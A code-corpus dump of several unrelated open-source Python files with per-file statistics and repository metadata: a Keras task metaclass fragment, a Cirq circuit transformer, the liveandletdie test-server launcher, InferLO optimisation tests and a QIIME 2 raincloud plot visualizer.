pass
new_dct = {"run": run, "validate": validate, "summary": summary,
"how_much": this.how_much, "get_dataset": get_dataset}
new_dct.update(dct)
return super().__new__(self, name, bases, new_dct)
return AbstractABTraining
def make_feature_learnability(noise_gen=None):
"""
Create a task that uses secondary neural network to learn the feature transform used by the first
"""
_noise_gen = noise_gen
class FeatureLearnabilityTask(Task):
"""
classmethods:
get_mapping
get_mapper_network(mapping_size)
"""
how_much = 9000
noise_gen = _noise_gen
from_path = "datasets/clarin-long/data"
def __new__(self, name, bases, dct):
this = self
@classmethod
def get_dataset(self):
dset = dataset.Dataset(noise_gen=this.noise_gen)
dset.loader_adapter = "clarin"
dset.get_from(self.from_path)
return dset
@classmethod
def validate(self, cache):
pass
@classmethod
def run(self, cache):
try:
if not os.path.exists(cache):
os.mkdir(cache)
except OSError:
pass
dset = self.get_dataset()
dset.select_first(self.how_much)
am = self.get_mapping()
mapping_generator = model.MappingGenerator(am.stages)
mapping = mapping_generator.get(dset)
dset.generate(mapping, ["clean"])
clean = dset.clean
dset = self.get_dataset()
dset.select_first(self.how_much)
am = self.get_windowing()
mapping_generator_2 = model.MappingGenerator(am.stages)
mapping_2 = mapping_generator_2.get(dset)
dset.generate(mapping_2, ["clean"])
sources = dset.clean
# print(clean.shape)
# print(sources.shape)
mapper = self.get_mapper_network(sources.shape, clean.shape)
mapper.compile(loss='mse', optimizer='adam')
mapper.summary()
valid = np.random.random(sources.shape[0]) > 0.8
mapper.fit(sources[~valid], clean[~valid],
batch_size=32,
callbacks=[
keras.callbacks.TerminateOnNaN(),
StopOnConvergence(4)
],
validation_data=[sources[valid], clean[valid]],
epochs=250,
)
print("=" * 60)
print("Task done!\n")
@classmethod
def summary(self, cache, show=False):
pass
@classmethod
def get_windowing(self):
mdl = self.get_mapping()
return mdl.__class__([mdl.stages[0]])
new_dct = {"run": run, "validate": validate, "summary": summary,
"how_much": this.how_much, "get_dataset": get_dataset,
"get_windowing": get_windowing}
assert "get_mapping" in dct.keys()
assert "get_mapper_network" in dct.keys()
new_dct.update(dct)
return super().__new__(self, name, bases, new_dct)
return FeatureLearnabilityTask
FeatureLearnabilityTask = make_feature_learnability()
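# Minimal usage sketch (hypothetical names): the asserts inside __new__ require
# a concrete class to define both get_mapping and get_mapper_network, matching
# the docstring of FeatureLearnabilityTask above.
#
# class MyLearnability(metaclass=FeatureLearnabilityTask):
#     @classmethod
#     def get_mapping(cls):
#         return model.AcousticModel(...)  # any model exposing a .stages list
#     @classmethod
#     def get_mapper_network(cls, source_shape, target_shape):
#         return keras.models.Sequential(...)  # any compilable keras model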
| 32.634812 | 113 | 0.535139 | 940 | 9,562 | 5.228723 | 0.209574 | 0.02767 | 0.017904 | 0.026043 | 0.446389 | 0.425229 | 0.40061 | 0.388606 | 0.382503 | 0.382503 | 0 | 0.00586 | 0.37534 | 9,562 | 292 | 114 | 32.746575 | 0.81701 | 0.060761 | 0 | 0.524272 | 0 | 0 | 0.058333 | 0.013813 | 0 | 0 | 0 | 0.006849 | 0.009709 | 1 | 0.106796 | false | 0.033981 | 0.033981 | 0.009709 | 0.291262 | 0.043689 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8707d1875735a5327cfd6fbf7ae8923132b4dfc | 4,390 | py | Python | cirq-core/cirq/transformers/merge_k_qubit_gates.py | LLcat1217/Cirq | b88069f7b01457e592ad69d6b413642ef11a56b8 | [
"Apache-2.0"
] | 1 | 2022-02-05T22:17:39.000Z | 2022-02-05T22:17:39.000Z | cirq-core/cirq/transformers/merge_k_qubit_gates.py | LLcat1217/Cirq | b88069f7b01457e592ad69d6b413642ef11a56b8 | [
"Apache-2.0"
] | 4 | 2022-01-16T14:12:15.000Z | 2022-02-24T03:58:46.000Z | cirq-core/cirq/transformers/merge_k_qubit_gates.py | LLcat1217/Cirq | b88069f7b01457e592ad69d6b413642ef11a56b8 | [
"Apache-2.0"
] | null | null | null | # Copyright 2022 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Transformer pass to merge connected components of k-qubit unitary operations."""
from typing import cast, Optional, Callable, TYPE_CHECKING
from cirq import ops, protocols, circuits
from cirq.transformers import transformer_api, transformer_primitives
if TYPE_CHECKING:
import cirq
def _rewrite_merged_k_qubit_unitaries(
circuit: 'cirq.AbstractCircuit',
*,
context: Optional['cirq.TransformerContext'] = None,
k: int = 0,
rewriter: Optional[Callable[['cirq.CircuitOperation'], 'cirq.OP_TREE']] = None,
merged_circuit_op_tag: str = "_merged_k_qubit_unitaries_component",
) -> 'cirq.Circuit':
deep = context.deep if context else False
def map_func(op: 'cirq.Operation', _) -> 'cirq.OP_TREE':
op_untagged = op.untagged
if (
deep
and isinstance(op_untagged, circuits.CircuitOperation)
and merged_circuit_op_tag not in op.tags
):
return op_untagged.replace(
circuit=_rewrite_merged_k_qubit_unitaries(
op_untagged.circuit,
context=context,
k=k,
rewriter=rewriter,
merged_circuit_op_tag=merged_circuit_op_tag,
).freeze()
).with_tags(*op.tags)
if not (protocols.num_qubits(op) <= k and protocols.has_unitary(op)):
return op
if rewriter:
return rewriter(
cast(circuits.CircuitOperation, op_untagged)
if merged_circuit_op_tag in op.tags
else circuits.CircuitOperation(circuits.FrozenCircuit(op))
)
return ops.MatrixGate(protocols.unitary(op)).on(*op.qubits)
return transformer_primitives.map_operations_and_unroll(
circuit, map_func, tags_to_ignore=context.tags_to_ignore if context else ()
).unfreeze(copy=False)
@transformer_api.transformer
def merge_k_qubit_unitaries(
circuit: 'cirq.AbstractCircuit',
*,
context: Optional['cirq.TransformerContext'] = None,
k: int = 0,
rewriter: Optional[Callable[['cirq.CircuitOperation'], 'cirq.OP_TREE']] = None,
) -> 'cirq.Circuit':
"""Merges connected components of unitary operations, acting on <= k qubits.
Uses rewriter to convert a connected component of unitary operations acting on <= k-qubits
into a more desirable form. If not specified, connected components are replaced by a single
`cirq.MatrixGate` containing unitary matrix of the merged component.
Args:
circuit: Input circuit to transform. It will not be modified.
context: `cirq.TransformerContext` storing common configurable options for transformers.
k: Connected components of unitary operations acting on <= k qubits are merged.
rewriter: Callable type that takes a `cirq.CircuitOperation`, encapsulating a connected
component of unitary operations acting on <= k qubits, and produces a `cirq.OP_TREE`.
Specifies how to merge the connected component into a more desirable form.
Returns:
Copy of the transformed input circuit.
Raises:
ValueError: If k <= 0.
"""
if k <= 0:
raise ValueError(f"k should be greater than or equal to 1. Found {k}.")
merged_circuit_op_tag = "_merged_k_qubit_unitaries_component"
circuit = transformer_primitives.merge_k_qubit_unitaries_to_circuit_op(
circuit,
k=k,
tags_to_ignore=context.tags_to_ignore if context else (),
merged_circuit_op_tag=merged_circuit_op_tag,
deep=context.deep if context else False,
)
return _rewrite_merged_k_qubit_unitaries(
circuit,
context=context,
k=k,
rewriter=rewriter,
merged_circuit_op_tag=merged_circuit_op_tag,
)
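# Usage sketch (assumes a working cirq installation; not part of this module):
# merge every run of single-qubit gates into a single MatrixGate.
#
# import cirq
# q0, q1 = cirq.LineQubit.range(2)
# circuit = cirq.Circuit(cirq.X(q0), cirq.Y(q0), cirq.CZ(q0, q1))
# merged = cirq.merge_k_qubit_unitaries(circuit, k=1)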
| 39.196429 | 97 | 0.68451 | 549 | 4,390 | 5.296903 | 0.304189 | 0.034044 | 0.051582 | 0.061898 | 0.355227 | 0.303645 | 0.289546 | 0.26685 | 0.25447 | 0.218019 | 0 | 0.003892 | 0.23918 | 4,390 | 111 | 98 | 39.54955 | 0.866766 | 0.357631 | 0 | 0.358209 | 0 | 0 | 0.11769 | 0.057749 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044776 | false | 0 | 0.059701 | 0 | 0.19403 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a871fe49f3be965b2393582da37217fcede6d062 | 17,538 | py | Python | liveandletdie/__init__.py | LeOndaz/liveandletdie | 86e174eda1a3a1ab810d16d1e3a85d0aff13dc55 | [
"MIT"
] | null | null | null | liveandletdie/__init__.py | LeOndaz/liveandletdie | 86e174eda1a3a1ab810d16d1e3a85d0aff13dc55 | [
"MIT"
] | null | null | null | liveandletdie/__init__.py | LeOndaz/liveandletdie | 86e174eda1a3a1ab810d16d1e3a85d0aff13dc55 | [
"MIT"
] | null | null | null | from __future__ import print_function
import argparse
from datetime import datetime
import os
import re
import signal
import ssl
import subprocess
import sys
import tempfile
import time
from werkzeug.serving import make_ssl_devcert
# pylint: disable=wrong-import-order
try:
from urllib.parse import urlsplit, splitport
except ImportError:
from urllib2 import splitport
from urlparse import urlsplit
import requests
_VALID_HOST_PATTERN = r'\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}([:]\d+)?$'
class LiveAndLetDieError(BaseException):
pass
def _log(logging, message):
if logging:
print('LIVEANDLETDIE: {0}'.format(message))
def _validate_host(host):
if re.match(_VALID_HOST_PATTERN, host):
return host
else:
raise argparse.ArgumentTypeError('{0} is not a valid host!'
.format(host))
def split_host(host):
"""
Splits host into host and port.
:param str host:
Host including port.
:returns:
A ``(str(host), int(port))`` tuple.
"""
host, port = (host.split(':') + [None])[:2]
return host, int(port)
def check(server):
"""Checks whether a server is running."""
return server.check()
def live(app):
"""
Starts a live app in a separate process
and checks whether it is running.
"""
return app.live()
def start(*args, **kwargs):
"""Alias for :funct:`live`"""
live(*args, **kwargs)
def die(app):
"""Stops a live app if it is running."""
return app.die()
def stop(*args, **kwargs):
"""Alias for :funct:`die`"""
die(*args, **kwargs)
def port_in_use(port, kill=False, logging=False):
"""
Checks whether a port is free or not.
:param int port:
The port number to check for.
:param bool kill:
If ``True`` the process will be killed.
:returns:
The process id as :class:`int` if in use, otherwise ``False`` .
"""
command_template = 'lsof -iTCP:{0} -sTCP:LISTEN'
process = subprocess.Popen(command_template.format(port).split(),
stdout=subprocess.PIPE)
headers = process.stdout.readline().decode().split()
if 'PID' not in headers:
_log(logging, 'Port {0} is free.'.format(port))
return False
index_pid = headers.index('PID')
index_cmd = headers.index('COMMAND')
row = process.stdout.readline().decode().split()
if len(row) < index_pid:
_log(logging, 'Port {0} is free.'.format(port))
return False
pid = int(row[index_pid])
command = row[index_cmd]
if pid and command.startswith('python'):
_log(logging, 'Port {0} is already being used by process {1}!'
.format(port, pid))
if kill:
_log(logging,
'Killing process with id {0} listening on port {1}!'
.format(pid, port))
os.kill(pid, signal.SIGKILL)
# Check whether it was really killed.
try:
# If still alive
kill_process(pid, logging)
# call me again
_log(logging,
'Process {0} is still alive! checking again...'
.format(pid))
return port_in_use(port, kill)
except OSError:
# If killed
return False
else:
return pid
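# Example sketch: check port 8001 and kill any python process bound to it;
# returns the pid as an int if still in use, otherwise False.
# pid_or_false = port_in_use(8001, kill=True, logging=True)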
def kill_process(pid, logging=False):
try:
_log(logging, 'Killing process {0}!'.format(pid))
os.kill(int(pid), signal.SIGKILL)
return
except OSError:
# If killed
return False
def _get_total_seconds(td):
"""
Fixes the missing :meth:`datetime.timedelta.total_seconds()`
method in Python 2.6
"""
# pylint: disable=invalid-name
return (td.microseconds + (td.seconds + td.days * 24 * 3600) * 10**6) \
/ 10 ** 6
class Base(object):
"""
Base class for all frameworks.
:param str path:
Absolute path to app directory or module (depends on framework).
:param str host:
A host at which the live server should listen.
:param float timeout:
Timeout in seconds for the check.
:param str check_url:
URL where to check whether the server is running.
Default is ``"http://{host}:{port}"``.
:param bool logging:
Whether liveandletdie logs should be printed out.
:param bool suppress_output:
Whether the stdout of the launched application should be suppressed.
"""
_argument_parser = argparse.ArgumentParser()
def __init__(self, path, host='127.0.0.1', port=8001, timeout=10.0,
check_url=None, executable='python', logging=False,
suppress_output=True, **kwargs):
self.path = path
self.timeout = timeout
self.host = host
self.port = port
self.process = None
self.executable = executable
self.logging = logging
self.suppress_output = suppress_output
self.check_url = 'http://{0}:{1}'.format(host, port)
self.scheme = 'http'
if check_url:
self.check_url = self._normalize_check_url(check_url)
def create_command(self):
pass
@property
def default_url(self):
return '{0}://{1}:{2}'.format(self.scheme, self.host, self.port)
def _kill(self):
if self.process:
try:
os.killpg(self.process.pid, signal.SIGKILL)
except OSError:
self.process.kill()
self.process.wait()
def _normalize_check_url(self, check_url):
"""
Normalizes check_url by:
* Adding the `http` scheme if missing
* Adding or replacing port with `self.port`
"""
# TODO: Write tests for this method
split_url = urlsplit(check_url)
host = splitport(split_url.path or split_url.netloc)[0]
return '{0}://{1}:{2}'.format(self.scheme, host, self.port)
def check(self, check_url=None):
"""
Checks whether a server is running.
:param str check_url:
URL where to check whether the server is running.
Default is ``"http://{self.host}:{self.port}"``.
"""
if check_url is not None:
self.check_url = self._normalize_check_url(check_url)
response = None
sleeped = 0.0
now = datetime.now()
while not response:
try:
response = requests.get(self.check_url, verify=False)
except requests.exceptions.ConnectionError:
if sleeped > self.timeout:
self._kill()
raise LiveAndLetDieError(
'{0} server {1} didn\'t start in specified timeout {2} '
'seconds!\ncommand: {3}'.format(
self.__class__.__name__,
self.check_url,
self.timeout,
' '.join(self.create_command())
)
)
time.sleep(1)
sleeped = _get_total_seconds(datetime.now() - now)
return _get_total_seconds(datetime.now() - now)
def live(self, kill_port=False, check_url=None):
"""
Starts a live server in a separate process
and checks whether it is running.
:param bool kill_port:
If ``True``, processes running on the same port as ``self.port``
will be killed.
:param str check_url:
URL where to check whether the server is running.
Default is ``"http://{self.host}:{self.port}"``.
"""
pid = port_in_use(self.port, kill_port)
if pid:
raise LiveAndLetDieError(
'Port {0} is already being used by process {1}!'
.format(self.port, pid)
)
host = str(self.host)
if re.match(_VALID_HOST_PATTERN, host):
with open(os.devnull, "w") as devnull:
if self.suppress_output:
self.process = subprocess.Popen(self.create_command(),
stderr=devnull,
stdout=devnull,
preexec_fn=os.setsid)
else:
self.process = subprocess.Popen(self.create_command(),
preexec_fn=os.setsid)
_log(self.logging, 'Starting process PID: {0}'
.format(self.process.pid))
duration = self.check(check_url)
_log(self.logging,
'Live server started in {0} seconds. PID: {1}'
.format(duration, self.process.pid))
return self.process
else:
raise LiveAndLetDieError('{0} is not a valid host!'.format(host))
def start(self, *args, **kwargs):
"""Alias for :meth:`.live`"""
self.live(*args, **kwargs)
def die(self):
"""Stops the server if it is running."""
if self.process:
_log(self.logging,
'Stopping {0} server with PID: {1} running at {2}.'
.format(self.__class__.__name__, self.process.pid,
self.check_url))
self._kill()
def stop(self, *args, **kwargs):
"""Alias for :meth:`.die`"""
self.die(*args, **kwargs)
@classmethod
def _add_args(cls):
cls._argument_parser.add_argument('--liveandletdie',
help='Run as test live server.',
type=_validate_host,
nargs='?',
const='127.0.0.1:5000')
@classmethod
def parse_args(cls, logging=False):
"""
Parses command line arguments.
Looks for --liveandletdie [host]
:returns:
A ``(str(host), int(port))`` or ``(None, None)`` tuple.
"""
cls._add_args()
args = cls._argument_parser.parse_args()
if args.liveandletdie:
_log(logging, 'Running as test live server at {0}'
.format(args.liveandletdie))
return split_host(args.liveandletdie)
else:
return None, None
class WrapperBase(Base):
"""Base class for frameworks that require their app to be wrapped."""
def create_command(self):
return [
self.executable,
self.path,
'--liveandletdie',
'{0}:{1}'.format(self.host, self.port),
]
class Flask(WrapperBase):
def __init__(self, *args, **kwargs):
"""
:param bool ssl:
If true, the app will be run with ``ssl_context="adhoc"`` and the
schema of the ``self.check_url`` will be ``"https"``.
"""
self.ssl = kwargs.pop('ssl', None)
super(Flask, self).__init__(*args, **kwargs)
if self.ssl:
self.scheme = 'https'
@classmethod
def _add_args(cls):
super(Flask, cls)._add_args()
cls._argument_parser.add_argument('--ssl',
help='Run with "adhoc" ssl context.',
type=bool,
nargs='?',
default=False)
def create_command(self):
command = super(Flask, self).create_command()
if self.ssl is True:
command += ['--ssl=1']
return command
def check(self, check_url=None):
url = self.check_url if check_url is None else \
self._normalize_check_url(check_url)
if self.ssl:
url = url.replace('http://', 'https://')
return super(Flask, self).check(url)
@classmethod
def wrap(cls, app):
"""
Adds test live server capability to a Flask app module.
:param app:
A :class:`flask.Flask` app instance.
"""
host, port = cls.parse_args()
ssl_context = None
if host:
if cls._argument_parser.parse_args().ssl:
try:
import OpenSSL # pylint: disable=unused-variable
except ImportError:
# OSX fix
sys.path.append(
'/System/Library/Frameworks/Python.framework/Versions/'
'{0}.{1}/Extras/lib/python/'
.format(sys.version_info.major, sys.version_info.minor)
)
try:
import OpenSSL # pylint: disable=unused-variable
except ImportError:
# Linux fix
sys.path.append(
'/usr/lib/python{0}.{1}/dist-packages/'
.format(sys.version_info.major, sys.version_info.minor)
)
try:
import OpenSSL # pylint: disable=unused-variable
except ImportError:
raise LiveAndLetDieError(
'Flask app could not be launched because the pyopenssl '
'library is not installed on your system!'
)
ssl_context = 'adhoc'
app.run(host=host, port=port, ssl_context=ssl_context)
sys.exit()
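# Usage sketch (hypothetical file names): the wrapped module behaves normally
# unless started with --liveandletdie.
#
# In the Flask app module (e.g. sample_app.py):
#   if __name__ == '__main__':
#       liveandletdie.Flask.wrap(app)
#       app.run()  # reached only when --liveandletdie was not passed
#
# In the test:
#   server = liveandletdie.Flask('sample_app.py', port=5000)
#   server.live(kill_port=True)
#   try:
#       ...  # exercise http://127.0.0.1:5000
#   finally:
#       server.die()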
class GAE(Base):
def __init__(self, dev_appserver_path, *args, **kwargs):
"""
:param str dev_appserver:
Path to dev_appserver.py
"""
super(GAE, self).__init__(*args, **kwargs)
self.dev_appserver_path = dev_appserver_path
self.admin_port = kwargs.get('admin_port', 5555)
def create_command(self):
command = [
self.dev_appserver_path,
'--host={0}'.format(self.host),
'--port={0}'.format(self.port),
'--admin_port={0}'.format(self.admin_port),
'--skip_sdk_update_check=yes',
self.path
]
if self.dev_appserver_path.endswith(('.py', '.pyc')):
command = [self.executable] + command
return command
class WsgirefSimpleServer(WrapperBase):
def __init__(self, *args, **kwargs):
"""
:param bool ssl:
If true, the app will be run with ssl enabled and the
scheme of the ``self.check_url`` will be ``"https"``.
"""
self.ssl = kwargs.pop('ssl', None)
super(WsgirefSimpleServer, self).__init__(*args, **kwargs)
if self.ssl:
self.scheme = 'https'
def create_command(self):
command = super(WsgirefSimpleServer, self).create_command()
if self.ssl is True:
command += ['--ssl=1']
return command
def check(self, check_url=None):
url = self.check_url if check_url is None else \
self._normalize_check_url(check_url)
if self.ssl:
url = url.replace('http://', 'https://')
return super(WsgirefSimpleServer, self).check(url)
@classmethod
def _add_args(cls):
super(WsgirefSimpleServer, cls)._add_args()
cls._argument_parser.add_argument('--ssl',
help='Run with ssl enabled.',
type=bool,
nargs='?',
default=False)
@classmethod
def wrap(cls, app):
host, port = cls.parse_args()
if host:
from wsgiref.simple_server import make_server
server = make_server(host, port, app)
if cls._argument_parser.parse_args().ssl:
# Set HTTPS='1' makes wsgiref set wsgi.url_scheme='https'
# This in turn makes pyramid set request.scheme='https'
server.base_environ['HTTPS'] = '1'
with tempfile.TemporaryDirectory() as td:
# Generate temporary self-signed cert/key pair
# using the library used by Flask for 'adhoc' ssl_context
certpath = '{}/liveandletdie'.format(td)
make_ssl_devcert(certpath)
server.socket = ssl.wrap_socket(
server.socket,
server_side=True,
certfile='{}.crt'.format(certpath),
keyfile='{}.key'.format(certpath),
)
server.serve_forever()
server.server_close()
sys.exit()
class Django(Base):
def create_command(self):
return [
self.executable,
os.path.join(self.path, 'manage.py'),
'runserver',
'{0}:{1}'.format(self.host, self.port),
]
class FastAPIServer(Base):
def __init__(self, *args, **kwargs):
kwargs['executable'] = 'uvicorn'
super().__init__(*args, **kwargs)
def create_command(self):
path_without_extension = self.path.rsplit('.', 1)[0]
return [
self.executable,
'{}:app'.format(path_without_extension),
'--host={}'.format(self.host),
'--port={}'.format(self.port),
'--reload',
]
| 30.342561 | 80 | 0.528338 | 1,917 | 17,538 | 4.696401 | 0.181012 | 0.032878 | 0.021326 | 0.01555 | 0.356659 | 0.30201 | 0.247584 | 0.216706 | 0.202932 | 0.180718 | 0 | 0.009362 | 0.360474 | 17,538 | 577 | 81 | 30.395147 | 0.793331 | 0.173623 | 0 | 0.364162 | 0 | 0.00289 | 0.090163 | 0.013251 | 0 | 0 | 0 | 0.001733 | 0 | 1 | 0.112717 | false | 0.00578 | 0.069364 | 0.008671 | 0.280347 | 0.00578 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a87422210ed17bb58ad8b0a9b840dbe0d698bc5e | 1,784 | py | Python | inferlo/pairwise/optimization/path_dp_test.py | InferLO/inferlo | a65efce721d7f99d2f274dd94a1aaf7ca159e944 | [
"Apache-2.0"
] | 1 | 2022-01-27T18:44:07.000Z | 2022-01-27T18:44:07.000Z | inferlo/pairwise/optimization/path_dp_test.py | InferLO/inferlo | a65efce721d7f99d2f274dd94a1aaf7ca159e944 | [
"Apache-2.0"
] | 3 | 2022-01-23T18:02:30.000Z | 2022-01-27T23:10:51.000Z | inferlo/pairwise/optimization/path_dp_test.py | InferLO/inferlo | a65efce721d7f99d2f274dd94a1aaf7ca159e944 | [
"Apache-2.0"
] | 1 | 2021-09-03T06:12:57.000Z | 2021-09-03T06:12:57.000Z | # Copyright (c) 2020, The InferLO authors. All rights reserved.
# Licensed under the Apache License, Version 2.0 - see LICENSE file.
import numpy as np
from inferlo import PairWiseFiniteModel
from inferlo.pairwise.optimization.path_dp import max_lh_path_dp
from inferlo.testing import grid_potts_model, tree_potts_model, \
line_potts_model
def test_grid_4x4x2():
model = grid_potts_model(4, 4, al_size=2, seed=0)
max_lh_gt = model.max_likelihood(algorithm='bruteforce')
max_lh = max_lh_path_dp(model)
assert np.allclose(max_lh, max_lh_gt)
def test_grid_3x3x4():
model = grid_potts_model(3, 3, al_size=4, seed=0)
max_lh_gt = model.max_likelihood(algorithm='bruteforce')
max_lh = max_lh_path_dp(model)
assert np.allclose(max_lh, max_lh_gt)
def test_grid_2x2x10():
model = grid_potts_model(2, 2, al_size=10, seed=0)
max_lh_gt = model.max_likelihood(algorithm='bruteforce')
max_lh = max_lh_path_dp(model)
assert np.allclose(max_lh, max_lh_gt)
def test_line_1000x10():
model = line_potts_model(gr_size=1000, al_size=10, seed=0)
max_lh_gt = model.max_likelihood(algorithm='tree_dp')
max_lh = max_lh_path_dp(model)
assert np.allclose(max_lh, max_lh_gt)
def test_tree_50x2():
model = tree_potts_model(gr_size=50, al_size=2, seed=0)
max_lh_gt = model.max_likelihood(algorithm='tree_dp')
max_lh = max_lh_path_dp(model)
assert np.allclose(max_lh, max_lh_gt)
def test_disconnected():
model = PairWiseFiniteModel(size=4, al_size=5)
model.add_interaction(0, 1, np.random.random(size=(5, 5)))
model.add_interaction(2, 3, np.random.random(size=(5, 5)))
max_lh_gt = model.max_likelihood(algorithm='bruteforce')
max_lh = max_lh_path_dp(model)
assert np.allclose(max_lh, max_lh_gt)
| 33.660377 | 68 | 0.742152 | 301 | 1,784 | 4.056478 | 0.212625 | 0.126945 | 0.068796 | 0.09828 | 0.563473 | 0.563473 | 0.530713 | 0.530713 | 0.530713 | 0.530713 | 0 | 0.038918 | 0.150224 | 1,784 | 52 | 69 | 34.307692 | 0.766491 | 0.071749 | 0 | 0.486486 | 0 | 0 | 0.032668 | 0 | 0 | 0 | 0 | 0 | 0.162162 | 1 | 0.162162 | false | 0 | 0.108108 | 0 | 0.27027 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a87615aea68a574978280da83ef3e7eeef1e199b | 4,516 | py | Python | q2_fmt/_visualizer.py | qiime2/q2-fmt | c2ea6a938bd7688f05a397abd8ad2e7982c53ce7 | [
"BSD-3-Clause"
] | null | null | null | q2_fmt/_visualizer.py | qiime2/q2-fmt | c2ea6a938bd7688f05a397abd8ad2e7982c53ce7 | [
"BSD-3-Clause"
] | null | null | null | q2_fmt/_visualizer.py | qiime2/q2-fmt | c2ea6a938bd7688f05a397abd8ad2e7982c53ce7 | [
"BSD-3-Clause"
] | 1 | 2022-03-07T20:34:23.000Z | 2022-03-07T20:34:23.000Z | # ----------------------------------------------------------------------------
# Copyright (c) 2022, QIIME 2 development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
import os
import pkg_resources
import jinja2
import json
import pandas as pd
def plot_rainclouds(output_dir: str, data: pd.DataFrame,
stats: pd.DataFrame = None):
table1 = None
if stats is not None:
table1, stats = _make_stats(stats)
J_ENV = jinja2.Environment(
loader=jinja2.PackageLoader('q2_fmt', 'assets')
)
x_label = data['measure'].attrs['title']
y_label = data['group'].attrs['title']
subject_unit = data['subject'].attrs['title']
title = f'{x_label} of {subject_unit} across {y_label}'
figure1 = (
f'Raincloud plots showing the distribution of subjects\''
f' measure of {x_label} across {y_label}. Kernel density estimation'
f' performed using a bandwidth calculated by Scott\'s method. Boxplots'
f' show the min and max of the data (whiskers) as well as the first,'
f' second (median), and third quartiles (box). '
f' Points and connecting lines represent individual subjects'
f' with a consistent jitter added across groups such that slopes'
f' across adjacent groups are visually comparable between subjects.')
index = J_ENV.get_template('index.html')
data = json.loads(data.to_json(orient='records'))
spec_fp = pkg_resources.resource_filename(
'q2_fmt', os.path.join('assets', 'spec.json'))
with open(spec_fp) as fh:
json_obj = json.load(fh)
full_spec = json_replace(json_obj,
data=data, x_label=x_label, y_label=y_label,
title=title)
with open(os.path.join(output_dir, 'index.html'), 'w') as fh:
spec_string = json.dumps(full_spec)
fh.write(index.render(spec=spec_string, stats=stats,
figure1=figure1, table1=table1))
def json_replace(json_obj, **values):
"""
Search for elements of `{"{{REPLACE_PARAM}}": "some_key"}` and replace
with the result of `values["some_key"]`.
"""
if type(json_obj) is list:
return [json_replace(x, **values) for x in json_obj]
elif type(json_obj) is dict:
new = {}
for key, value in json_obj.items():
if type(value) is dict and list(value) == ["{{REPLACE_PARAM}}"]:
param_name = value["{{REPLACE_PARAM}}"]
new[key] = values[param_name]
else:
new[key] = json_replace(value, **values)
return new
else:
return json_obj
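# Worked example (not in the module): placeholder dicts are replaced by the
# matching keyword argument, while other values pass through untouched.
# json_replace({"data": {"{{REPLACE_PARAM}}": "data"}, "title": "fixed"},
#              data=[1, 2, 3])
# returns {"data": [1, 2, 3], "title": "fixed"}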
def _make_stats(stats):
method = stats['test-statistic'].attrs['title']
group_unit = (stats['A:group'].attrs['title']
+ ' vs ' + stats['B:group'].attrs['title'])
pval_method = stats['p-value'].attrs['title']
qval_method = stats['q-value'].attrs['title']
table1 = (f'{method} tests between groups ({group_unit}), with'
f' {pval_method} p-value calculations and {qval_method}'
f' correction for multiple comparisons (q-value).')
df = pd.DataFrame(index=stats.index)
group_a = _make_group_col('A', stats)
df[group_a.name] = group_a
group_b = _make_group_col('B', stats)
df[group_b.name] = group_b
df['A'] = stats['A:measure']
df['B'] = stats['B:measure']
df = df.merge(stats.iloc[:, 6:], left_index=True, right_index=True)
df.columns = pd.MultiIndex.from_tuples([
('Group A', stats['A:group'].attrs['title']),
('Group B', stats['B:group'].attrs['title']),
('A', stats['A:measure'].attrs['title']),
('B', stats['B:measure'].attrs['title']),
('', 'n'),
('', 'test-statistic'),
('', 'p-value'),
('', 'q-value'),
])
html = df.to_html(index=False)
return table1, html
def _make_group_col(prefix, df):
group_series = df[prefix + ':group']
group_n = df[prefix + ':n']
if (group_series.dtype == float
and group_series.apply(float.is_integer).all()):
group_series = group_series.astype(int)
group_series = group_series.apply(str)
group_n = " (n=" + group_n.apply(str) + ")"
series = group_series + group_n
series.name = f'{"Group "}' + prefix
return series
| 36.419355 | 79 | 0.58791 | 584 | 4,516 | 4.390411 | 0.325342 | 0.046802 | 0.029251 | 0.014041 | 0.032761 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005834 | 0.240921 | 4,516 | 123 | 80 | 36.715447 | 0.742124 | 0.097874 | 0 | 0.021505 | 0 | 0 | 0.246789 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043011 | false | 0 | 0.053763 | 0 | 0.150538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8774bec857cbb97e4eda662898c5c3beaf5c549 | 14,862 | py | Python | fbp_calculator/dialogfbp.py | deselmo/FBP_Calculator | 90bb07f123fea224fdca24aabeceabd391b7d51e | [
"MIT"
